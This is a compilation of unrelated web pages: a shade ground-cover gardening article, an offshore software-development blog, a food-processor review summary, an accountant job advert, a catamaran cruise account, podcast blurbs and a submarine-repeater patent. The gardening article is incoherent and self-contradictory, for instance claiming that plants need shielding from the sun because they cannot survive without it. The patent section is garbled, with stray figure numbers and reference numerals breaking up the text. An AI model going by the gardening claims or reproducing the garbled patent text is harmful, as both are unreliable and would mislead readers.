It’s best to go with a ground cover that can last in the long run, which should offer some amount of protection for the plants under it.
What is the best ground cover for shaded areas? Most plants have roots in areas of soil that are moist, and this is the reason why they can thrive in that area.
As such, you should be able to find a ground cover that can be adapted to be used in these types of environments.
This means it should be durable enough to endure the elements, but it also has to have a good cover over the plants that need it the most.
How does a good ground cover work?
It will offer shade for the plants that you want to grow, and it should make it easier for them to breathe in the lower humidity of their surroundings.
While some ground covers are very lightweight, this does not mean that they can’t perform its main function: keeping the plants in the area of shade safe.
Some lightweight covers are so thin that they cannot keep the plants protected from the harmful effects of the heat of the sun.
What is the best ground cover for shaded areas? What should you look for in a ground cover?
Remember that these types of plants require more than just shade to survive. They need to receive all of the moisture that they need in order to thrive.
In order to provide your plants with the type of ground cover that will allow them to get the proper amount of moisture needed, you will need to select a ground cover that has a high water absorption capability.
This is important because the plants need the right amount of water to avoid root rot. Make sure that you choose a ground cover that has the ability to absorb as much water as possible.
What is the best ground cover for shaded areas? If you want to save money, you should go with the ground cover that has absorbent capabilities, since the cost of the ground cover will come from the plant.
The more the plant needs water, the more you should expect to pay for the ground cover.
The best ground cover for shaded areas is one that absorbs a good amount of water, but still has a thin layer of soil on top. This allows the plants to remain protected without having to sacrifice style or a stylish appearance.
It’s important to remember that this is a serious investment and you will want to make sure that you select the best ground cover for shaded areas that can actually help your plants.
How can plants grow in the shade?
Some of the most common questions that people who grow gardens ask are, how can plants grow in the shade?
If you are unsure of how a plant can grow in the shade, then there are three main things that you need to know.
First, plants that grow in the shade need protection from the sun. It is also very important to protect their roots from the sun.
All plants can absorb the energy from the sun but there are a few different types of plants that can withstand the sun better than others.
There are many ways to protect the roots of your plants and some of the best ways are shown in the following paragraph.
Plants need to be protected against the sun because they cannot survive without sunlight.
When the sun’s rays reach the leaves, they are broken down and taken out of the plant. Without the sun, the plant would not have a chance to do its job.
Shade is needed to prevent the plant from getting damaged by the sun.
Without shade, the roots would dry out and die, thus preventing the plant from getting nutrients from the soil. This is why shade is important for plants.
Shade allows the plant to absorb its water and nutrients from the soil.
There are many different plants that can survive in the shade if they are protected from the sun.
If a plant gets too much sunlight, it will simply not be able to stay alive or grow any plants.
Conclusion
Shade can come in a variety of different forms. A flower can grow under a bush and look great.
You might find a flower that looks great in a small pot under the bush and now you have a beautiful plant under the bush.
If the bush were to die, the flower would not survive.
Many people plant flowers under a bush because the bush is naturally shaded.
The flowers will absorb the energy from the sun and the plant will survive. However, many plants would not survive in this type of form of shade.
When you grow plants, you need to protect them from the sunlight and the sun is essential for them to survive.
Shade is needed to protect the plants from the sun and help them to grow the way they should. | https://www.plantgardener.com/colorful-plants-shade/ |
Building your own software? Dig into everything you need to know about software development—quite possibly the most booming industry in today’s business world.
In this digital era, most solutions to a problem come as software. When you look around, you see all different kinds of it—web and mobile applications, Software-as-a-Service, middleware, and system software, among others. These products are all a result of software development.
Most people imagine software development as a group doing magic in a lab to build one product. And that is not far from the truth. With constant divination of what the clients want or the lines of text not understandable to a normal person, magic looks like a mild day in software development.
But comparisons aside, software development is the most disruptive solution for multiple global businesses and industries. In this article, we’ll delve into everything you need to know about software development. Here are our key discussions:
- How Does Software Development Work?
- Know More About Software Development Teams
- Best Practices in Software Development
- Hire a Software Development Team
How Does Software Development Work?
IBM defines software development as “a set of computer science activities dedicated to the process of creating, designing, deploying and supporting software.” These activities have subsets that converge to realize a full-fledged software product. We have the team assembly part, product development, and the actual groundwork of writing code.
Let’s look at the different phases of the software development lifecycle (SDLC). The SDLC defines the fundamental steps a software product undertakes to complete a defined iteration or version. It usually starts by building a minimum viable product (MVP) and then moving forward to build enhancements, fixes, and new features.
So, let’s discuss each essential phase of software development.
1. Research and Validation
The first phase involves how the team conceives the software product in the abstract. The team answers questions like “how did the product come to mind?” or “what problem does it solve?” In this case, they will refine all the software application ideas into one solid solution.
Then, the team can perform product research and market validation. This is the phase that aims to hit the following objectives:
- Is there a problem that the product solves?
- Does a market for this product exist?
- Are there similar products in the market?
- Does this product have a competitive advantage?
- Define the short-term and long-term goals of the product.
2. Design
In the design phase, subject matter experts collaborate to architect the entire system. The team works together to create a product requirements document (PRD) that encompasses the entire software’s functional and non-functional requirements. This technical document also defines the scope and limitations of the software product to build the MVP.
Moreover, the user interface and user experience designers work directly with decision-makers to map out the software’s behavior. Software engineers and architects define the technologies used to build the software product.
3. Development
For this phase, the software developers begin writing code for the software. Each program they build will be tested and validated alongside the requirements. Regularly, the team will sync up to discuss the accomplishments, current tasks, and blockers while doing the project.
4. Testing
The testing stage expands the testing efforts on the software to ensure that each bit cross-checks the requirements indicated in the PRD. There are various types of testing, mainly functional and non-functional testing—both manual and automated.
Here are the types of functional testing:
- Unit testing
- System testing
- Integration testing
- User Acceptance testing
These are the types of non-functional testing:
- Performance testing
- Security testing
- Compatibility testing
- Usability testing
Note that there are other types of software testing depending on the needs of the system.
5. Deployment and Maintenance
Once the software undergoes development and testing, it’s time to release it. The deployment environment would depend on the type of software—web application, desktop application, mobile application, cloud service, etc.
The final product may exhibit some issues, so it is imperative that the team continuously monitors the software’s status. Furthermore, this is the time to gather customer feedback and conduct studies to integrate new features, enhancements, and fixes. The software development lifecycle will then continue.
Read: Agile vs. Waterfall
Know More About Software Development Teams
So, we’ve learned about the processes that go into software development. These processes are essential to ensure that the team successfully takes the product to market; it takes skilled team members that know and understand their specific role(s) in project completion.
This part will introduce the key roles and positions in software development. Let’s start.
Product Owner
As a primary software project stakeholder, a product owner oversees the product’s vision. They mostly work with the clients to identify, assess, and refine the product requirements. As such, their main responsibility is to supervise the team and ensure that the project navigates toward the target direction.
Project Manager
The project manager has a more hands-on role in software development than the product owner. They are responsible for breaking down tasks and delegating them to the appropriate team members. Moreover, they facilitate communication within teams and track project milestones and timelines.
Get a project manager if you need someone to keep your project in check! That’s what we recommend to all our clients here at Full Scale. And it works!
Developers
Software developers come in different types depending on expertise. First, we have front-end developers skilled in building the user-facing side of the software. Second, we have back-end developers who program the server-side of the system. They write the software’s responses based on users’ inputs.
Finally, we have full-stack developers capable of doing both front-end and back-end development. Meaning, they’re experts in building both ends of the software from scratch.
UI/UX Designers
The User Interface and User Experience designer roles encompass the work related to the software’s look and feel. They create how the software looks visually and how elements of the pages interact and respond. Some designers only specialize in either UI or UX. But it’s also cost-effective to hire a designer who can wear both hats.
QA Testers
The quality assurance (QA) team ensures that the software performs as intended. They also identify problems in the development or of the actual product. In addition, they perform tests at any point in development and as needed. For example, when a developer finishes a task, they can pass it on to a QA resource for testing.
Business Analyst
A business analyst handles the business aspect of building the technology. This means that they perform research and analysis on the current market trends and behavior to identify how the software fits in. In a smaller team, the roles of the business analyst and product owner can sometimes merge for one person.
Best Practices in Software Development
We’ve already identified the “what” and the “who’s” of software development. It’s time to answer how to ensure success in this endeavor. Here’s a list of the common best practices in software development that are relevant in today’s tech landscape.
1. Foster open lines of communication
Open communication builds a solid foundation for a software team. As an industry that relies on trust and transparency, it pays to establish a space where everyone can express their thoughts freely.
Whether it’s on task breakdown, workflows, and feedback, each member must be empowered to speak up and be heard. This is also a great way to show that each part of the team not only has contributions but valuable ones.
2. Build comprehensive process documentation structures
One thing that disrupts a project’s progress is the lack of documentation. It should be mandatory to document every part of the project from start to finish. The team can work on creating a product requirements document and keep tabs on their own activities.
Some essential information to include:
- coding standards
- time spent on tasks
- tools used
- access credentials
- daily or weekly milestones
- code reviews
- code versions
- release versions
- release notes
3. Use the right tools
A well-organized team and workflow aren’t enough to ensure software development success. Using the right tools maximizes the capabilities of the things your team can do and improve the overall productivity.
At Full Scale, our developers are well-versed in choosing the right tools for development. We also train our developers to be flexible, so there is a shorter learning curve when using new tools or frameworks.
4. Lead strategically
A strong leadership strategy generates a more effective team collaboration. Leaders should promote an environment where developers are encouraged to experiment. In this way, the team can feel more creative in approaching each task and developing innovative solutions.
Hire a Software Development Team Today!
Full Scale knows everything about software development. As such, we have assembled software development teams for our growing clientele.
We specialize in providing fast and affordable offshore software development services without breaking the bank. Our offshore arm in the Philippines is a hub of talented, globally-competitive software experts.
Our talent pool is all you need to form a software development team! We also have project managers, QA specialists, designers, and digital marketing experts alongside software developers. | https://fullscale.io/blog/everything-about-software-development/ |
Review analysis
Amazon.co.uk review summary for AT 444
alaTest has collected and analyzed 22 user reviews of AT 444 from Amazon.co.uk. The average user rating for this product is 4.0/5, compared to an average user rating of 4.2/5 for other Food Processors on Amazon.co.uk.
82% of the reviews on Amazon.co.uk give this product a positive rating.
| |
This business are a local Harrogate based service provider with over 15 years experience in their field. The business, who have offices based on the outskirts of Harrogate, have recently gone through some significant growth, and are therefore now recruiting an Assistant Accountant to join their small, close knit finance team.
The role will report directly to the Finance Manager, and will responsible for a wide variety of the day to day finance tasks, from purchase/sales ledger duties, reconcilliations, credit control, through to assisting with some of the basic monthly management accounts preparation. Therefore, this role would be ideally suite to a candidate looking for a wide ranging, and all round finance role within a smaller, local business.
The key duties of this role will include:
- Generating sales invoices
- Credit control
- Inputting purchase invoices, matching purchase orders & reconciling statements
- Bank reconciliation
- Assisting the Management Accountant in financial reporting and daily tasks
- Answering the phone, dealing with customer and supplier queries
- General admin and office support, updating spreadsheets and assisting others
The successful candidate will:
- Have a minimum of 3 years experience within an Assistant Accountant role within an SME - Essential
- Have previous experience of Sage Line 50 - Essential
- Have fantastic interpersonal skills and a strong work ethic - Essential
- Be AAT Qualified - Desirable
The company can offer: | https://www.woodrowmercer.com/jobs/accounts-assistant-60 |
This final article describing my trip from Plymouth to the Caribbean, then on to the north east coast of the USA and finally south to Central America is written after sailing 15,000 miles in 18 months. Mostly there have been two on board, but I was single handed for nearly 3000 miles, had three on the Atlantic crossing, and five for two weeks over Christmas 2003.
We left the UK in my 32ft Eclipse catamaran (see PBO 449) in late October 2002, and sailed as fast as possible to the Rias in north Spain. These would be a fantastic cruising ground in good weather - but not in November! With bad weather forecast we sailed non-stop from Bayonna to Lisbon. The Cascais marina is huge, and nearly empty. Unfortunately we found the visitors pontoons almost untenable due to surge, so we moved into the inner harbour while the "Route de Rhum" gale blew itself out. Then, in still very rough seas, we sailed straight to the Canaries. Apart from Grasciosa, north of Lanzarote, I can't recommend the Canaries except as somewhere to buy stores for the Atlantic crossing.
With two crew I work 3 on/3 off watches, but that doesn't give enough time to sleep, so on long passages I prefer to have three crew and thus a comfortable 3 on/6 off regime. Therefore long time colleague Pip Patterson from the Multihull Centre joined us for the Atlantic crossing. Although you may feel that you don't want to have strangers on your boat, there's usually no shortage of potential crew that you know, either family or fellow sailing club members. In any event, they will only be aboard a few weeks and the third crew really does make long distance sailing more enjoyable and far less tiring.
Like everyone else we wanted to be in the Caribbean for Christmas, and so left Tenerife on Nov 30th. Really it was too early, as the trades hadn't settled, so although we had good NE winds on our first three days (we had over 16 knots on the GPS several times the first day despite being heavily loaded), the wind slowly moderated; one day we even spent motoring over a glassy sea. So we were somewhat disappointed to take 18 days to Barbados, but I cheered up later when I learnt that most others who left at the same time took 20-22.
Many people are put off ocean sailing by the fear of bad weather and assume the Atlantic is full of the "gale force winds and mountainous seas" so loved by the media. As I explained in part 2 it's now easy to get reliable forecasts, while with unlimited time and the whole world to sail to there's no excuse for being caught out in severe weather. Thus my storm jib has never been out of its bag (my worst weather on Eclipse was a November day-sail from Falmouth to Plymouth in winds gusting over 50 knots). Ironically I've not used the masthead spinnaker and drifter since the calms of mid Atlantic. But what is probably more surprising to coastal sailors is that with careful planning I have only sailed to windward for 100 miles since leaving the Canaries (14,000 miles ago!)
So another misconception is that to sail oceans you need a serious ocean cruiser designed for the ultimate gale. Most people "out there doing it" realise that such boats are hopeless as a live aboard home, so it's been interesting to see the boats that people actually sail. It's certainly not Colin Archers or a junk rigged boat (I've only seen 2, one was ex-Annie Hill's Badger), while surprisingly few people sail multi-chine steel boats. In fact the vast majority of cruisers sail 30-40ft, often elderly, GRP boats. Catamarans are the second most popular type, but then maybe sailing to the Caribbean is no longer considered ocean sailing?
Even after only a couple of months away I was finding that ocean cruising is not like going on several back-to-back 3 week cruises. You're living your life as well. That means sometimes you'll be ill, you'll need to visit friends, sort out business affairs etc., and above all sometimes you'll need a holiday from your holiday. Even I (whom many people consider a fanatical sailor!) find it hard to sail every day, day in day out. You need to treat it as a job, and have a day off at least once a week. Because you are living on board even as you sail along, average boat speeds will be lower than when day-sailing, just to stay comfortable. So although I have had some memorable sails, twice doing 60 miles in 6 1/2 hours, once off Puerto Rico and again off Cuba, I prefer to cruise at 6 knots rather than 9.
It also means that what you have in your loft at home you must now store on the boat. Not just the obvious things like a vacuum cleaner and sewing machine, but also the Christmas tree, spare bedding for guests, winter clothes etc. Finding space for all these "essentials" is always hard. For example, although I have over 600 books on a CD, an 8ft shelf for paperbacks and another 3ft long for big books (mainly pilot books), I still don't have enough bookshelf space.
Back to the sailing; after Christmas I went on to Grenada (my favourite Caribbean island) and then sailed north through the West Indies to the Virgin Islands. I found that the Caribbean is now very crowded compared to when I first sailed there 25 years ago. As a result many of the locals have become quite aggressive and my favourite cruising areas have been redeveloped. Although the Grenadines are still largely unspoilt I wouldn't visit the French islands or St Lucia again.
Most European sailors start going home from Antigua but I was going to the USA, so after the Virgins I split from the normal cruising crowd and went on to Puerto Rico and then the Bahamas. Immediately there were fewer boats, in fact it would now be rare to see a sail on the horizon and Eclipse would often be alone in a beautiful anchorage. It wasn't until I arrived in Georgetown in the Bahamas that I saw boats again, even the USA hotspots like Newport or the Cheasepeake weren't as crowded as the Caribbean.
Unfortunately, after 6 months I was beginning to have boat problems. Although the basic hull, rig and deck gear were all working well the "domestics" weren't. I was already on my third water pump and had got through 4 water tanks, while my cooker looked twenty years old, not two. I sail a relatively simple boat, it seemed that cruisers on larger, more complex, boats simply sail from repair man to repair man.
I always say the successful cruises are the boring ones, completed with no fuss or drama. So I felt I had been doing well until, that is, July 7th. That day was not just my worst day sailing, but the worst in my life. I was motoring up the Inter Coastal Waterway (ICW) near Cape Hatteras in N Carolina when Eclipse was hit by lightning. The whole sorry saga is the subject of a separate article, suffice to say that I lost all my electronics, while the engine and fridge needed major, expensive, repairs. It took me several months to replace it all, but at least I was still alive and still had a sailing boat. Apart from anything else it was an expensive disaster for, as you will recall from part 2, I only carry third party insurance.
I have to confess that, lightning aside, I didn't really like sailing up the east coast of the USA. It was far too hot in June/July and there was often very little wind. However it was a great experience to sail through New York, past the Statue of Liberty then on under the Brooklyn Bridge and past the United Nations buildings to exit into Long Island Sound. In 1989 I sailed through the Baltic to the USSR on a Strider so was familiar with sailing between rocky islands covered with fir trees. Maine, about 200 miles NE of New York, is like that, but for us "tropical softies" it was cold! But what spoilt it was the lobster pot buoys. There are 1000 registered fishermen in Maine, and each made full use of his 1000 pot allocation. In many areas it was impossible to sail without catching them in boards or rudders. Fortunately on Eclipse these lift easily, but sailing there would be a nightmare on a boat with a fixed rudder and exposed propellor.
When you tell your non-sailing friends that you're going to sail round the world they often ask "do you anchor at night?" You laugh at them, but in fact that is exactly what you will do. Despite sailing over a quarter of the way round the world and visiting 24 countries I have spent less than 30 nights at sea. Every other night I have indeed been at anchor as I always try to passage plan so that I don't have to sail more than 100 miles non-stop. Having said that, anchoring in a new harbour every day is actually quite stressful. I nearly always set two anchors, both large enough to hold the boat in any wind. I often anchor among (but not on!) coral heads or in abrasive sand, so use an extra thick warp to prevent chafe. Ideally I'd like stainless steel chain as the galvanising has long worn off.
It's not just a new port every day, but also a new type of cruising ground every week. The deep water and high West Indian islands of the Caribbean gave way to the low scrub islands, coral reefs and shallows of the Bahamas. But there the water is clear, sometimes you can see the bottom at 100 ft (imagine that in the Solent!). The ICW and Cheasepeake are equally shallow, but visibility is only a couple of feet. Fortunately the world has few places with tides as high as in the English Channel. It made life very easy and it was a real relief not to have to worry about calculating tidal heights. The Caribbean, Bahamas and Cheasapeake have no real tide, while even in Maine it's only about 10ft.
In early September we reached Soames Sound in Maine, only 50 miles from the Canadian border, our "furthest north" and began to retrace our steps back to the Bahamas. We thought it would be an easy trip back, but hurricane Isobel had other ideas. One reason for sailing north was to be out of the hurricane belt (roughly 12-35deg N). We were in Long Island Sound when Isobel struck the Cheasepeake. Fortunately for us it passed over with no more fuss than a winters gale, but further south they weren't so lucky. When we returned to Annapolis we found that, although only a few boats had been lost, over 600 homes had been destroyed.
Christmas 2003 was spent in the Abacos, to me the best of the Bahamian islands. From there we sailed south through the Jumentos to Cuba, Belize and Guatemala. Again we saw very few boats (but several were British) indeed we reckoned there were only 30 cruising boats in the whole of Belize. Most cruisers only visit the eastern Caribbean, but the Caribbean Sea has three other sides as well! So the "Forgotten Caribbean" is the subject for a later article.
Finally, ocean cruising can only be a dream until you think you can afford it. So a key question for everyone is "How much does it cost?" Well, fortunately the answer is "Surprisingly little." I know everyone's life style is different, so costs are hard to compare but never-the-less, living at sea is much cheaper than on land. You have no car expenses, no council tax, no heating, no TV license etc. Even if you spend time in marinas and eat out a lot you'll still spend less than cruising round the UK. You soon learn to eat out "three streets back" and, with plenty of time, you walk or take buses rather than taxis.
My boat is currently in a Guatemalan marina, which is a very safe and cheap place to spend the hurricane season. Even though it has no road access it's not primitive by any means, as it has a swimming pool, restaurant, cable TV, 24/7 internet access on board etc, and all for £100 a month!!
So in conclusion, I am sure that, if you can sail a small boat (say under 35ft) from Poole to the Channel Islands, you can sail it across the oceans. On a small simple boat you'll see the same sunsets and sit on the same tropical islands as those with a superyacht. Indeed with shallow draft and a short rig you can actually visit more places, for it is difficult or impossible to sail a boat much over 40ft in the Bahamas, along the ICW, or in the Cheasepeake, Belize or Guatemala. So we are lucky as these smaller and simpler boats are the ones which we, as PBO readers, sail. | http://mail.sailingcatamarans.com/index.php/articles/38-offshore-cuising-articles/26-crossing-the-atlantic-on-eclipse-part-3 |
Before the 2000s, Japanese cuisine was almost absent from the Perth, Australia food scene, but within a decade, it could be found everywhere. In this episode, Gastronomica Editorial Collective member Jaclyn Rohel talks with anthropologist Satomi Fukutomi about how the increasing availability of Japanese cuisine in Perth changed how people...
Cheese’s Perfect Pairings
By: Rachael Markow Whether you’re putting Gruyere on pizza, enjoying gouda with Cabernet Sauvignon, or snacking on cheddar and apples while reading a great book, there isn’t much that doesn’t pair well with cheese. This playlist features some favorite cheese pairings in honor of our partnership with Emmi USA. If...
Learning About Sustainable Cooking & Farming with Gabe Kennedy AKA @gabe_kennedy
Gabe Kennedy AKA @Gabe_Kennedy joins the show to speak with Feedfeed Senior Producer Alexa Santos (@alexawhatsfordinner) about his path from restaurant chef to entrepreneur. Gabe has shaped menus and cooked his way around the globe with a mission to promote a more communal, green and healthy world. Heritage Radio Network...
Beyond PB&J: The Culinary Couplings You Need To Know
Meat and Three is taking a slightly different approach to Valentine’s Day this year. Instead of more stories about food and love, we’re delving into some culinary odd couples. Today, we pay tribute to some pairings that might be unfamiliar, like migas and rainy days. We’ll also hear about a...
Holiday Cooking Tips with Jon Kung AKA @chefjonkung - a Chinese-American restaurant cook turned viral content creator!
On today's episode, Feedfeed's @alexawhatsfordinner chats with Jon Kung AKA @chefjonkung on social media. Jon Kung is a detroit-based former restaurant cook with Chinese roots. He calls himself a "third culture" cook, in that he embodies the cultures of his Chinese parents along with the culture of his Western upbringing...
What's For Dinner? Jeanelle Castro AKA @jeanelleats talks about how she tells stories and connects people through food!
In this episode, Feedfeed Food Editor Alexa Santos virtually sits down to dinner with Jeanelle Castro, AKA @jeanelleats on social media. Jeanelle was born and raised in the Philippines and is a full-time video content creator. She strives to tell stories and unify through food. Her favorite thing to do...
What's For Dinner? Emily Fedner AKA @foodloversdiary joins the show to talk dumplings, pasta, and more!
In this episode, Feedfeed Food Editor Alexa Santos virtually sits down to dinner with Emily Fedner AKA @foodloversdiary on social media. Emily is a cook, trained TV host, and content creator with an affinity for carb-based dishes! Emily speaks about her Russian roots, how her grandmother inspired her love of... | https://heritageradionetwork.org/tag/social-media |
CROSS-REFERENCE TO RELATED APPLICATION
FIELD
BACKGROUND
SUMMARY
DESCRIPTION OF EMBODIMENTS
This application is based upon and claims the benefit of priority of the prior Japanese Patent Application No. 2014-083624, filed on Apr. 15, 2014, the entire contents of which are incorporated herein by reference.
The embodiments discussed herein are related to a repeater, a feedthrough arranged in this repeater, and a repeater manufacturing method.
As an underwater device to be arranged under water, there have been conventionally known a submarine repeater which amplifies an optical signal transmitted through a submarine cable laid in the sea, a submarine branching unit which branches a submarine cable, and others. An underwater device has a feedthrough to keep water-tightness and air-tightness of a pressure-tight casing (see International Publication Pamphlet No. WO 2006/097972, Japanese Laid-Open Patent Publication No. 2002-142351, and Japanese Laid-Open Patent Publication No. 10-107702, for example).
Today, there is a movement to use a submarine cable as a cable for both telecommunications and monitoring. Such movement is referred to as “Green Repeater” in the International Telecommunication Union Telecommunication Standardization Sector (ITU-T).
A global monitoring network designed to monitor water temperatures, earthquakes, tsunamis, and the like is formed by underwater devices, which are one example of repeaters, equipped with measuring devices for measuring temperatures, pressure, acceleration and the like, for example. In the case where such a measuring device is attached to the exterior of a pressure-tight casing of an underwater device, a feedthrough placed in the pressure-tight casing is provided with a plurality of lead sections to be connected with electric wire cables such as a power wire, a ground wire, and a signal wire.
In this connection, techniques for connecting a cable coated with an insulating material to each of lead sections of a feedthrough include high frequency brazing, resistance brazing, crimping, and the like. After the connection with any of these connection techniques, the connected part is molded by an insulating material and thus is insulated. Note that the connection technique such as brazing, crimping, or the like mentioned above is often adopted instead of soldering, since the solder may melt when a molded part is hot.
A resistance brazing machine is used for resistance brazing work, and a high frequency coil is used for high frequency brazing work. In addition, a crimping tool is used for crimping connection work. If the resistance brazing machine, the high frequency coil, the crimping tool or the like is used with a space for using the tool blocked by the plurality of lead sections, cable connection work is difficult.
Note that a plurality of lead sections are provided to a single feedthrough in cases other than the case described above in which an underwater device is equipped with the measuring devices. For example, a plurality of lead sections may be provided to a single feedthrough also in a case where an underwater device is equipped with a device such as an underwater mateable connector or the like.
According to an aspect of the embodiments, a repeater includes: a pressure-tight casing to be arranged on seabed or in sea; and a feedthrough having a plurality of lead sections each configured to connect a circuit housed in the pressure-tight casing with a cable outside the pressure-tight casing, wherein the plurality of lead sections include at least a power wire and an electric signal wire, and at least two of the plurality of lead sections have a difference in length from each other.
The object and advantages of the invention will be realized and attained by means of the elements and combinations particularly pointed out in the claims.
It is to be understood that both the foregoing general description and the following detailed description are exemplary and explanatory and are not restrictive of the invention, as claimed.
1
401
100
200
300
410
411
A repeater, a feedthrough and a repeater manufacturing method according to embodiments of the present disclosure are described hereinafter. Note that in the embodiment, a submarine repeater , which is an underwater device, is described as an example of a “repeater”, and a submarine branching unit , which is an underwater device, is described. In addition, as an example of a “feedthrough”, feedthroughs for an electric wire , , and feedthroughs for an optical fiber , are described in the embodiment.
FIG. 1
1
is a front view illustrating the submarine repeater of the first embodiment.
FIG. 2
1
is a partial sectional front view illustrating the submarine repeater according to the first embodiment.
FIG. 3
FIG. 2
is an enlarged view of a part III of .
FIG. 1
FIG. 2
1
2
3
4
5
6
7
8
As illustrated in and , the submarine repeater includes a pressure-tight casing (one example of a casing) , couplers , , bellows , , and cable couplings , .
FIG. 3
1
9
10
11
12
13
14
In addition, as illustrated in , the submarine repeater further includes an internal unit , optical fiber feedthroughs , , tail cables , , and a measuring device which is an example of measurement hardware.
FIG. 3
2
10
2
11
100
2
2
2
a
b
As illustrated in , the pressure-tight casing is internally kept water-tight and airtight by the optical fiber feedthrough placed on an end face on one end side, and the optical fiber feedthrough and an electric wire feedthrough placed on an end face on other end side. With this structure, the interior of the pressure-tight casing is made free from pressure of seawater. The pressure-tight casing is shaped in a hollow cylinder, for example.
3
4
2
2
2
3
4
3
4
3
4
2
3
4
5
6
a
b
a
a
b
b
The couplers , are provided on the sides of both ends (end faces , ) of the pressure-tight casing . The couplers , are shaped like a cylinder, for example. The couplers , have joint rings , located on the side of the pressure-tight casing and clamp rings , located on the side of the bellows , .
3
4
2
2
2
3
4
3
4
3
4
3
4
2
a
a
a
b
a
a
b
b
a
a
The joint rings , are screwed into outer circumference surfaces on the sides of both ends (end faces , ) of the pressure-tight casing . A plurality of seawater introduction holes are formed on outer circumference surfaces of the joint rings , . The seawater introduction holes being formed, the interior of the couplers , is filled with seawater. The clamp rings , are screwed into outer circumference surfaces of the ends of the joint rings , opposite to the side of the pressure-tight casing .
5
6
3
4
7
8
7
8
3
4
5
6
7
8
3
4
FIG. 1
FIG. 2
The bellows , illustrated in and are positioned between the couplers , and the cable couplings , . The cable couplings , are coupled to the couplers , by a universal joint so that an angle made by each other may vary. The bellows , curve with the cable couplings , inclining with respect to the couplers , .
7
8
12
13
1001
7
8
7
8
7
8
2
1001
1001
1
FIG. 3
FIG. 1
FIG. 2
Within the cable couplings , , the tail cables , illustrated in and a submarine cable illustrated in and are connected. The cable couplings , have such a tapered shape that a diameter of the cable couplings , becomes smaller as the cable couplings , are away from the pressure-resistant casing . Although the submarine cable is arranged on the seabed, for example, the submarine cable may be floating in the sea. Similarly, the submarine repeater may be floating in the sea, instead of being arranged on the seabed.
12
13
1001
The tail cables , and the submarine cable have a tubular power feeding conductor coated by an insulator such as polyethylene and the like, and optical fibers located inside the power feeding conductor.
9
2
9
1001
9
14
The internal unit is housed within the pressure-tight casing . The internal unit also has an optical signal amplifier configured to amplify an optical signal transmitted through the submarine cable . In addition, the internal unit may have a circuit board (one example of a control unit) configured to control the measuring device , for example.
100
14
1001
9
10
14
1001
Directly or indirectly connected with the electric wire feedthrough , the measuring device is indirectly connected with the submarine cable by way of the internal unit and the optical fiber feedthrough . This electrically connects the measuring device with the submarine cable .
14
2
In addition, information acquired by the measuring device is processed by a circuit (the above-mentioned circuit board, which is one example of the control unit, for example) housed in the pressure-tight casing .
14
The measuring device measures one or more of the conditions in the sea (one example in water), such as water pressure, water temperature, acceleration (earthquake motion), salinity, electric conductance, underwater sound, cable electric generation voltage, anthropogenic carbon, and the like. Note that the conditions in the sea also include conditions of sea surface or conditions of the seabed.
14
14
4
14
1
1
If the measuring device is a water temperature gauge, it is desirable that the measuring device is located on the exterior of the coupler , being spaced a distance from any member other than the measuring device of the submarine repeater , in order to avoid any influence of quantity of heat released from the submarine repeater .
1
1
2
100
FIG. 1
FIG. 3
In addition, a configuration of the submarine repeater illustrated in to is one example of a configuration that the submarine repeater includes the pressure-tight casing and the feedthrough (electric wire feedthrough ), and may be changed as appropriate.
FIG. 4
100
is a partial sectional perspective view illustrating the electric wire feedthrough according to the first embodiment.
FIG. 5
FIG. 4
100
is a view of one end side of the electric wire feedthrough when viewed from a direction V of .
FIG. 6A
FIG. 6B
FIG. 5
FIG. 6A
FIG. 6B
FIG. 4
and are VIA/VIB-VIA/VIB cross sectional views (views illustrating how the electric wire cable is connected) of . Note that the cross sections in and are identical to the cross section of .
FIG. 4
100
101
104
111
112
As illustrated in , the electric wire feedthrough has a plurality of lead sections to , a main body section , and a cap member .
111
111
111
111
111
111
2
2
2
a
b
c
d
a
b
FIG. 3
The main body section includes a flange section , an outer projection section , an inner projection section , and a disk member . The main body section is positioned in a through-hole formed on the end faces , on the both sides of the pressure-tight casing illustrated in , for example.
111
111
2
111
111
2
b
a
c
a
FIG. 4
FIG. 6A
FIG. 6B
FIG. 4
FIG. 6A
FIG. 6B
The outer projection section projects from the flange section to an outer side of the pressure-tight casing (right side in , , and ). In addition, the inner projection section projects from the flange section to an inner side of the pressure-tight casing (left side in , , and ).
111
111
112
111
111
111
1
101
104
111
a
d
d
b
c
Within the flange section is provided the disk member whose diameter is larger than an inside diameter of the cap member . The disk member is subjected to pressure applied from the side of the outer projection section to the side of the inner projection section , in a direction (arrow direction D) in which the plurality of lead sections to run through the main body section .
111
111
111
111
a
b
c
d
Materials of the flange section , the outer projection section , and the inner projection section are an insulating material such as polyethylene, and the like, for example. In addition, a material of the disk member is metal such as beryllium copper alloy and the like, for example.
112
111
111
111
112
a
c
The cap member has a tubular shape and is provided on a part of the circumference on the side of the flange section of the inner projection section of the main body section . A material of the cap member is metal such as beryllium copper alloy and the like, for example.
112
112
111
111
112
2
2
2
112
112
2
2
2
a
a
a
b
a
FIG. 4
A flange section of the cap member is in contact with the flange section of the main body section . A conical section (left side in ) of the cap member is pressed into the end face , (a conically shaped through-hole) of the pressure-tight casing by moving the flange section in a cone direction by a press machine. Thus, the conical section of the cap member is fixed to the pressure-tight casing , and seals the interior of the pressure-tight casing . This keeps the interior of the pressure-tight casing water-tight and airtight.
100
100
111
101
104
FIG. 4
FIG. 6B
Note that the configuration of the electric wire feedthrough illustrated in to is an example of a configuration that the electric wire feedthrough includes the main body section and the plurality of lead sections to , and may be changed as appropriate.
101
104
101
102
103
104
101
102
103
104
111
2
In the first embodiment, the plurality of lead sections to may be sorted to one central lead section and three (one example of multiple leads) outer circumferential lead sections , , . The central lead section and the outer circumferential lead sections , , run through the main body section , extending to both sides of the inner side and the outer side of the pressure-tight casing .
FIG. 4
FIG. 4
FIG. 4
101
102
103
104
101
102
103
104
2
101
102
103
104
101
102
103
104
2
101
111
111
102
103
104
111
a
a
a
a
b
b
b
b
d
d
d.
As illustrated in , for the central lead section and the outer circumferential lead sections , , , small-diameter parts , , , are formed on ends on the outer side (right side in ) of the pressure-tight casing . In addition, also for the central lead section and the outer circumferential lead sections , , , small-diameter parts , , , are also formed on ends of the inner side (left side in ) of the pressure-tight casing . Note that while the central lead section is fixed to the disk member in contact with the disk member , an insulator is intermediate between the outer circumferential lead sections , , and the disk member
FIG. 5
FIG. 5
FIG. 4
FIG. 4
101
111
111
111
1
101
102
103
104
111
111
111
111
111
101
b
a
b
c
